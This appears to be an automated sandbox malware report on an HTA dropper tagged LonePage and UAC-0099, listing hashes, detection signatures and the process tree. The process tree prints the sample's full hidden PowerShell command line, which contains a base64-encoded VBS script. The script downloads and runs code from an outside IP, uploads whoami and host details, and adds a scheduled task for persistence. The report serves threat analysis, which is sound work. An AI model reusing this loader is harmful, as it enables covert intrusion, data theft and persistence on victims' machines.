Edit tour
Windows
Analysis Report
MSkUffzfPy.hta
Overview
General Information
Sample name: | MSkUffzfPy.htarenamed because original name is a hash value |
Original sample name: | 38b49818bb95108187fb4376e9537084062207f91310cdafcb9e4b7aa0d078f9.hta |
Analysis ID: | 1522690 |
MD5: | 766497a165435b2d1f8722875fb76cc1 |
SHA1: | 490358273659279acdd14d7a0ba84a6b50006fd5 |
SHA256: | 38b49818bb95108187fb4376e9537084062207f91310cdafcb9e4b7aa0d078f9 |
Tags: | htaUAC-0099user-JAMESWT_MHT |
Infos: | |
Detection
LonePage
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected LonePage
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 7696 cmdline:
mshta.exe "C:\Users\ user\Deskt op\MSkUffz fPy.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - powershell.exe (PID: 7760 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden -nop -noni -exec byp ass -c kil l -name ms hta;$a='ZG ltIHIsIGMN CnNldCByID 0gY3JlYXRl b2JqZWN0KC JXU2NyaXB0 LlNoZWxsIi kNCmMgPSAi cG93ZXJzaG VsbC5leGUg LWV4ZWN1dG lvbnBvbGlj eSBieXBhc3 MgLXcgaGlk ZGVuIC1ub3 Byb2ZpbGUg LWMgc3Rhcn Qtc2xlZXAg Mzk7c3Rhcn Qtc2xlZXAg KGdldC1yYW 5kb20gLW1p biA1IC1tYX ggNDMpO3N0 YXJ0LXNsZW VwIDExOyRp aWs9bmV3LW 9iamVjdCBu ZXQud2ViY2 xpZW50OyRm bG09JGlpay 5kb3dubG9h ZGRhdGEoJ2 h0dHA6Ly8y LjU5LjIyMi 45ODo0Mzgy MC9TWnFHbn BSTEZRSXlj ZEtiL3BhZ2 UxMTQvdXBn cmFkZS50eH QnKTtpZigk ZmxtLkxlbm d0aCAtZ3Qg MSl7JGprcj 1bc3lzdGVt LnRleHQuZW 5jb2Rpbmdd Ojp1dGY4Lm dldFN0cmlu ZygkZmxtKT tpZigkamty IC1tYXRjaC AnZ2V0LWNv bnRlbnQnKX tbYnl0ZVtd XSAkZHJweT 1JRVggJGpr cjt9ZWxzZX skYmpkbz13 aG9hbWk7JG JqZG8rPSc9 PSc7JGJqZG 8rPVtTeXN0 ZW0uTmV0Lk Ruc106Okdl dEhvc3RBZG RyZXNzZXMo JGlwKStbU3 lzdGVtLkVu dmlyb25tZW 50XTo6TmV3 TGluZTskaG JuPUlFWCAk amtyOyRiam RvKz0kaGJu fE91dC1zdH Jpbmc7W2J5 dGVbXV0kZH JweT1bc3lz dGVtLnRleH QuZW5jb2Rp bmddOjpVdG Y4LkdldEJ5 dGVzKCRiam RvKTt9O3N0 YXJ0LXNsZW VwIDEwOyR1 ams9bmV3LW 9iamVjdCBu ZXQud2ViY2 xpZW50O3N0 YXJ0LXNsZW VwIDE2OyR1 amsudXBsb2 FkZGF0YSgn aHR0cDovLz IuNTkuMjIy Ljk4OjI4ND AyL3BhZ2Ux MTQnLCRkcn B5KTt9Ig0K ci5SdW4gYy wgMCwgZmFs c2UNCg=='; $b=[System .Convert]: :FromBase6 4String($a );$c=[Syst em.Text.En coding]::u tf8.GetStr ing($b);se t-content $home\AppD ata\Local\ Microsoft\ Windows\Sh ell\Layout s.vbs -val ue $c;scht asks.exe / create /TN SearchUpd ateTaskMac hineCore / SC minute /mo 4 /tr $home\AppD ata\Local\ Microsoft\ Windows\Sh ell\Layout s.vbs /f;; ;;$temp='U EsDBBQACAA IAJEzfFcAA AAAAAAAAAA AAAALAAAAX 3JlbHMvLnJ lbHONjzsOw jAQRK9ibU8 2UCCE4qRBS GmjcADL3jh R4o9s87s9L igIoqAc7cz bmap5mIXdK MTJWQ7bogR GVjo1Wc3h0 p83B2jqqqN FpOyI4+Qjy xEbOYwp+SN ilCMZEQvny ebL4IIRKcu g0Qs5C024K 8s9hk8GrJm sF0FT4nB3Q aFy8mrIpiL jgLWKg5911 6rcrX96+ue zG4ZJ0ukN+ lHgywEM6wp XM+sXUEsHC E+L3TymAAA AHAEAAFBLA wQUAAgACAC RM3xXAAAAA AAAAAAAAAA AHAAAAHdvc mQvX3JlbHM vZG9jdW1lb nQueG1sLnJ lbHOtkMsKw jAQRX8lzN6 mdSEiTbsRo dtSPyAm0wc 2D5JU7N8bF MSKgguXw8y 95zB5eVUju aDzg9EMsiQ FgloYOeiOw bE5rLZQFnm NIw/xwveD9 SRGtGfQh2B 3lHrRo+I+M RZ13LTGKR7 i6DpquTjzD uk6TTfUvXb AspM03HUYG OhJndBFeBK rgFSSgTSir mT0amaLv1B N2w4C90ZMC nX4AKdPChD 6RcSHeUT/b pH90+KBuCv QxYOLG1BLB wjc8wDAtgA AAJYBAABQS wMEFAAIAAg AkTN8VwAAA AAAAAAAAAA AABEAAAB3b 3JkL2RvY3V tZW50Lnhtb O1dbW8bxxH +Kwt+SQvQP L5IFE1EDtw CaQskRZAX5 KNBkSeJBck j7s5mlE+WG dsJYESGYyi A++IYLdp+p FQzok2JAfo Ldv9Cf0lnZ u+OlHSySYq yltRQNu9ub 3fvOPPs7Oz s7Oz7H3xVr 4k7tutVncZ qIpNKJ4TdK DuVamNjNfH F5x9eKySE5 5calVLNadi riS3bS3xw4 /1WseKUb9f thi+ggoZXb K0mNn2/WbQ sr7xp10tey mnaDbi37rj 1kg+X7obVc txK03XKtud B/fWalU2n8 1a9VG0ksMo 1p7KFxyZ9f